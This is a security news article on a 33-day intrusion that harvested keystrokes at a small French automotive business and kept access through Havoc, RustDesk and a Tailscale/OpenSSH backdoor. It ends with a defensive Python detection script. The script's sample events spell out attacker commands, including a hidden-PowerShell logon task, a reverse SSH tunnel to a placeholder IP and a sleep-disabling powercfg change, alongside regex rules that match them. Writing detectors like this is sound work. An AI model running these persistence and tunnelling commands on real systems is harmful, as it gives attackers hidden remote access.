Cybersecurity researchers have detailed an intrusion campaign targeting a small automotive business in France, highlighting how attackers can maintain long-term access to compromised systems even after their primary command-and-control infrastructure becomes unavailable. The investigation, conducted by Cato Networks’ CTRL research team, provided a rare view into an attacker’s activities through direct observation of command execution rather than reliance solely on forensic evidence. Researchers were able to reconstruct the operation after the threat actor inadvertently exposed SSH keys, operational notes, and a detailed attack playbook in an unsecured storage bucket. The campaign, attributed to a French-speaking operator known as “Poisson,” lasted 33 days and involved 339 recorded commands. Although researchers described the individual as a relatively inexperienced threat actor, the intrusion demonstrated how readily available tools and persistence techniques can allow attackers to retain access to compromised environments for extended periods.
According to Cato Networks, the attacker initially breached the organisation and deployed a keylogger designed to capture banking credentials, email account information, and authentication details used by employees. The operation focused primarily on harvesting sensitive login information rather than conducting ransomware activity or large-scale data theft. Researchers observed that the attacker compromised four separate systems despite displaying inconsistent operational discipline throughout the campaign. The threat actor reportedly used low-cost infrastructure, including a virtual private server hosted in Berlin, DuckDNS services, and Backblaze B2 cloud storage. Investigators found multiple operational mistakes, including repeated exposure of personal directories, storage buckets named after the attacker’s online alias, and testing artifacts left within malicious tools. Despite these errors, the campaign successfully established a foothold within the targeted environment.

The malware chain relied heavily on in-memory execution techniques. A Visual Basic Script downloader initiated the infection process, followed by PowerShell and .NET components that loaded the Havoc Demon remote access agent directly into memory without writing the payload to disk. The attacker also attempted to gain elevated privileges through Windows User Account Control prompts, requiring victims to manually approve access requests before administrative permissions could be obtained.
Once persistence was established, the attacker implemented multiple mechanisms to ensure continued access. Researchers documented the creation of scheduled tasks configured to execute at every user logon with elevated privileges, shellcode injection into Explorer.exe processes, and deployment of a customised version of RustDesk as a secondary remote access channel. The keylogger used during the operation was relatively simple, consisting of approximately 70 lines of Python code that recorded keystrokes to local files. Rather than automating the collection process, the attacker manually retrieved harvested information and modified power management settings to prevent compromised systems from entering sleep mode.

The most significant activity occurred on April 7, when the attacker installed OpenSSH Server and Tailscale on an infected machine. By joining the device to a private Tailscale network and configuring key-based SSH access along with reverse tunnelling capabilities, the threat actor created an alternative access path that operated independently of the primary command-and-control infrastructure. Researchers noted that this move proved particularly effective when the Havoc command-and-control server became unavailable the following day. Because the Tailscale connection functioned separately, the attacker retained uninterrupted access despite the outage.
The investigation revealed that the command-and-control infrastructure resumed operation on April 26, allowing previously deployed malware agents to reconnect automatically without requiring additional compromise activity. During the final phase of the intrusion, the attacker executed more than 145 commands, examined smart card and certificate storage locations, and ran two unidentified programs extracted from a file named “Thales.zip” for approximately 32 minutes. Researchers were unable to determine the exact purpose of those programs. Before ending activity on May 1, the attacker removed 17 files from compromised systems and ceased operations.

Cato Networks noted that many of the tools used during the campaign were legitimate applications commonly abused by threat actors, including Tailscale, OpenSSH, and RustDesk. Similar techniques have previously been associated with advanced threat groups and financially motivated cybercriminal operations. Researchers advised organisations to monitor for unusual installation of OpenSSH on Windows workstations, unexpected deployment of Tailscale, creation of reverse SSH tunnels, suspicious script execution through Windows Script Host, privileged scheduled tasks, and changes to power management settings. The findings underscore the importance of investigating alternative persistence mechanisms whenever command-and-control infrastructure associated with an intrusion is identified, as removing a single access channel may not fully eliminate an attacker’s presence within a compromised environment.
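The monitoring advice above, and the layered persistence described earlier, can be turned into a small hunt over process-creation telemetry. The following is an added example written for this article, not code from Cato Networks or the report; the sample events, host names, user names, paths and the placeholder Tailscale key are constructed, and the rules key only on the indicators the researchers list (OpenSSH Server installation, Tailscale, reverse SSH tunnels, Windows Script Host, privileged logon tasks, power settings).

```python
import re

# Constructed sample process-creation records (not from the Cato report); fields
# loosely follow a Sysmon Event ID 1 / Windows 4688 record.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "j.doe", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\j.doe\AppData\Local\Temp\facture.vbs"'},
    {"host": "ws01", "user": "j.doe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn Updater /tr "powershell -w hidden -f C:\ProgramData\u.ps1" /sc onlogon /rl highest'},
    {"host": "ws01", "user": "j.doe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0"},
    {"host": "ws01", "user": "j.doe", "image": r"C:\Program Files\Tailscale\tailscale.exe",
     "cmdline": "tailscale up --authkey tskey-PLACEHOLDER"},
    {"host": "ws01", "user": "j.doe", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh -N -R 2222:localhost:22 relay@198.51.100.7"},
    {"host": "ws01", "user": "j.doe", "image": r"C:\Windows\System32\powercfg.exe",
     "cmdline": "powercfg /change standby-timeout-ac 0"},
    {"host": "ws02", "user": "a.martin", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# One rule per indicator the report says to monitor; each regex runs over
# "<image> <cmdline>" so either the binary path or its arguments can match.
RULES = [
    ("wsh_script_execution", re.compile(r"\\[wc]script\.exe\b.*\.(vbs|vbe|js|jse|wsf)\b", re.I)),
    ("privileged_logon_task", re.compile(r"schtasks.*?/create(?=.*/sc\s+onlogon)(?=.*/rl\s+highest)", re.I)),
    ("openssh_server_install", re.compile(r"OpenSSH\.Server|\\sshd\.exe\b", re.I)),
    ("tailscale_deployment", re.compile(r"\\tailscaled?\.exe\b|\btailscale\s+up\b", re.I)),
    ("reverse_ssh_tunnel", re.compile(r"\\ssh\.exe\b.*\s-R\s+\S+", re.I)),
    ("power_management_change", re.compile(r"powercfg.*(standby|hibernate|monitor)-timeout", re.I)),
]

def detect(events):
    # One finding per (rule, event) match, keeping host, user and the command line.
    findings = []
    for ev in events:
        text = f"{ev['image']} {ev['cmdline']}"
        for name, pattern in RULES:
            if pattern.search(text):
                findings.append({"rule": name, "host": ev["host"], "user": ev["user"], "cmdline": ev["cmdline"]})
    return findings

def hosts_with_layered_access(findings, minimum=3):
    # Hosts where several distinct rules fire: the stacked secondary-access pattern
    # the report describes, which taking down the primary C2 alone would not remove.
    rules_by_host = {}
    for f in findings:
        rules_by_host.setdefault(f["host"], set()).add(f["rule"])
    return sorted(h for h, rules in rules_by_host.items() if len(rules) >= minimum)
```

Any single rule firing on its own (an administrator legitimately enabling OpenSSH, for instance) deserves a look but is not conclusive; several firing on one host in a short window is the pattern worth escalating, and the correct response is to hunt for every access channel rather than block only the C2 address.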